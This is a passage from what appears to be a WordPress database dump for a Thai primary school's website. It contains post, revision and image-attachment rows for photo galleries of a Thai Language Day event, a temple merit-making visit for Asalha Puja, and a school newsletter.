class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871390_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1835\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1836,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871409_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1836\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1838,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871410_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1838\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1837,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871411_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1837\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1839,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871412_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1839\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1841,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871413_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1841\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1840,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871414_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1840\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1842,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871415_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1842\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1843,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871416_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1843\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1845,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871417_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1845\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1846,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871418_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1846\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1844,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871419_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1844\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1847,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871379_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1847\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1848,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__9871388_0-1024x768.jpg\" alt=\"\" class=\"wp-image-1848\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','รักษ์ภาษาไทย เนื่องในสัปดาห์วันภาษาไทย แห่งชาติ ปี 2568','','inherit','closed','closed','','1804-revision-v1','','','2025-07-09 10:17:55','2025-07-09 03:17:55','',1804,'http://pakhaeng.ssk.in.th/?p=1850',0,'revision','',0),
(1852,1,'2025-07-15 08:26:53','2025-07-15 01:26:53','<!-- wp:paragraph -->\n<p>วันที่ 9 กรกฎาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำนักเรียนพร้อมด้วยคณะครู และบุคลากรทางการศึกษา ร่วมทำบุญที่ วัดบ้านหนองปลาเข็ง เพื่อถวายผ้าอาบฝน และเทียนพรรษาแด่พระภิกษุสงฆ์ เนื่องในวันอาสาฬหบูชา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1853,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939278_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1853\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1854,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939277_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1854\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1857,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939274_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1857\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1855,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939276_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1855\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1856,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1856\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1858,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1858\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1860,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1860\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1859,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1859\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1861,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_5-768x1024.jpg\" alt=\"\" class=\"wp-image-1861\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1864,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1864\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1862,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1862\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1863,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1863\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1865,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1865\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ทำบุญเนื่องในวันอาสาฬหบูชา และวันเข้าพรรษา','','publish','closed','closed','','%e0%b8%97%e0%b8%b3%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b9%80%e0%b8%99%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b9%83%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2%e0%b8%ac%e0%b8%ab%e0%b8%9a','','','2025-07-15 08:30:01','2025-07-15 01:30:01','',0,'http://pakhaeng.ssk.in.th/?p=1852',0,'post','',0),
(1853,1,'2025-07-15 08:26:25','2025-07-15 01:26:25','','S__76939278_0','','inherit','','closed','','s__76939278_0','','','2025-07-15 08:26:25','2025-07-15 01:26:25','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939278_0.jpg',0,'attachment','image/jpeg',0),
(1854,1,'2025-07-15 08:26:25','2025-07-15 01:26:25','','S__76939277_0','','inherit','','closed','','s__76939277_0','','','2025-07-15 08:26:25','2025-07-15 01:26:25','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939277_0.jpg',0,'attachment','image/jpeg',0),
(1855,1,'2025-07-15 08:26:25','2025-07-15 01:26:25','','S__76939276_0','','inherit','','closed','','s__76939276_0','','','2025-07-15 08:26:25','2025-07-15 01:26:25','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939276_0.jpg',0,'attachment','image/jpeg',0),
(1856,1,'2025-07-15 08:26:25','2025-07-15 01:26:25','','LINE_ALBUM_วันสำคัญต่างๆ_250715_8','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_8','','','2025-07-15 08:26:25','2025-07-15 01:26:25','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_8.jpg',0,'attachment','image/jpeg',0),
(1857,1,'2025-07-15 08:26:25','2025-07-15 01:26:25','','S__76939274_0','','inherit','','closed','','s__76939274_0','','','2025-07-15 08:26:25','2025-07-15 01:26:25','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939274_0.jpg',0,'attachment','image/jpeg',0),
(1858,1,'2025-07-15 08:26:26','2025-07-15 01:26:26','','LINE_ALBUM_วันสำคัญต่างๆ_250715_9','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_9','','','2025-07-15 08:26:26','2025-07-15 01:26:26','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_9.jpg',0,'attachment','image/jpeg',0),
(1859,1,'2025-07-15 08:26:29','2025-07-15 01:26:29','','LINE_ALBUM_วันสำคัญต่างๆ_250715_6','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_6','','','2025-07-15 08:26:29','2025-07-15 01:26:29','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_6.jpg',0,'attachment','image/jpeg',0),
(1860,1,'2025-07-15 08:26:29','2025-07-15 01:26:29','','LINE_ALBUM_วันสำคัญต่างๆ_250715_7','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_7','','','2025-07-15 08:26:29','2025-07-15 01:26:29','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_7.jpg',0,'attachment','image/jpeg',0),
(1861,1,'2025-07-15 08:26:30','2025-07-15 01:26:30','','LINE_ALBUM_วันสำคัญต่างๆ_250715_5','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_5','','','2025-07-15 08:26:30','2025-07-15 01:26:30','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_5.jpg',0,'attachment','image/jpeg',0),
(1862,1,'2025-07-15 08:26:31','2025-07-15 01:26:31','','LINE_ALBUM_วันสำคัญต่างๆ_250715_3','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_3','','','2025-07-15 08:26:31','2025-07-15 01:26:31','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_3.jpg',0,'attachment','image/jpeg',0),
(1863,1,'2025-07-15 08:26:31','2025-07-15 01:26:31','','LINE_ALBUM_วันสำคัญต่างๆ_250715_2','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_2','','','2025-07-15 08:26:31','2025-07-15 01:26:31','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_2.jpg',0,'attachment','image/jpeg',0),
(1864,1,'2025-07-15 08:26:31','2025-07-15 01:26:31','','LINE_ALBUM_วันสำคัญต่างๆ_250715_4','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_4','','','2025-07-15 08:26:31','2025-07-15 01:26:31','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_4.jpg',0,'attachment','image/jpeg',0),
(1865,1,'2025-07-15 08:26:34','2025-07-15 01:26:34','','LINE_ALBUM_วันสำคัญต่างๆ_250715_1','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b3%e0%b8%84%e0%b8%b1%e0%b8%8d%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b9%86_250715_1','','','2025-07-15 08:26:34','2025-07-15 01:26:34','',1852,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_1.jpg',0,'attachment','image/jpeg',0),
(1866,1,'2025-07-15 08:26:53','2025-07-15 01:26:53','<!-- wp:paragraph -->\n<p>วันที่ 9 กรกฎาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำนักเรียนพร้อมด้วยคณะครู และบุคลากรทางการศึกษา ร่วมทำบุญที่ วัดบ้านหนองปลาเข็ง เพื่อถวายผ้าอาบฝน และเทียนพรรษาแด่พระภิกษุสงฆ์ เนื่องในวันอาสาฬหบูชา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1853,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939278_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1853\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1854,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939277_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1854\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1857,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939274_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1857\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1855,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939276_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1855\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1856,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1856\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1858,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1858\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1860,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1860\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1859,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1859\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1861,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_5-768x1024.jpg\" alt=\"\" class=\"wp-image-1861\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1864,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1864\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1862,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1862\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1863,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1863\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1865,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1865\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','ทำบุญเนื่อในวันอาสาฬหบูชา และวันเข้าพรรษา','','inherit','closed','closed','','1852-revision-v1','','','2025-07-15 08:26:53','2025-07-15 01:26:53','',1852,'http://pakhaeng.ssk.in.th/?p=1866',0,'revision','',0),
(1867,1,'2025-07-15 08:27:57','2025-07-15 01:27:57','<!-- wp:image {\"id\":1868,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/13-68-724x1024.png\" alt=\"\" class=\"wp-image-1868\"/></figure>\n<!-- /wp:image -->','วารสาร 13/2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3-13-2568','','','2025-07-15 08:27:59','2025-07-15 01:27:59','',0,'http://pakhaeng.ssk.in.th/?p=1867',0,'post','',0),
(1868,1,'2025-07-15 08:27:39','2025-07-15 01:27:39','','13-68','','inherit','','closed','','13-68','','','2025-07-15 08:27:39','2025-07-15 01:27:39','',1867,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/13-68.png',0,'attachment','image/png',0),
(1869,1,'2025-07-15 08:27:57','2025-07-15 01:27:57','<!-- wp:image {\"id\":1868,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/13-68-724x1024.png\" alt=\"\" class=\"wp-image-1868\"/></figure>\n<!-- /wp:image -->','วารสาร 13/2568','','inherit','closed','closed','','1867-revision-v1','','','2025-07-15 08:27:57','2025-07-15 01:27:57','',1867,'http://pakhaeng.ssk.in.th/?p=1869',0,'revision','',0),
(1870,1,'2025-07-15 08:29:59','2025-07-15 01:29:59','<!-- wp:paragraph -->\n<p>วันที่ 9 กรกฎาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำนักเรียนพร้อมด้วยคณะครู และบุคลากรทางการศึกษา ร่วมทำบุญที่ วัดบ้านหนองปลาเข็ง เพื่อถวายผ้าอาบฝน และเทียนพรรษาแด่พระภิกษุสงฆ์ เนื่องในวันอาสาฬหบูชา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1853,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939278_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1853\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1854,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939277_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1854\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1857,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939274_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1857\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1855,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/S__76939276_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1855\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1856,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_8-1024x768.jpg\" alt=\"\" class=\"wp-image-1856\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1858,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_9-1024x768.jpg\" alt=\"\" class=\"wp-image-1858\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1860,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_7-1024x768.jpg\" alt=\"\" class=\"wp-image-1860\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1859,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_6-1024x768.jpg\" alt=\"\" class=\"wp-image-1859\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1861,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_5-768x1024.jpg\" alt=\"\" class=\"wp-image-1861\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1864,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_4-1024x768.jpg\" alt=\"\" class=\"wp-image-1864\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1862,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1862\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1863,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_2-1024x768.jpg\" alt=\"\" class=\"wp-image-1863\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1865,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/LINE_ALBUM_วันสำคัญต่างๆ_250715_1-1024x768.jpg\" alt=\"\" 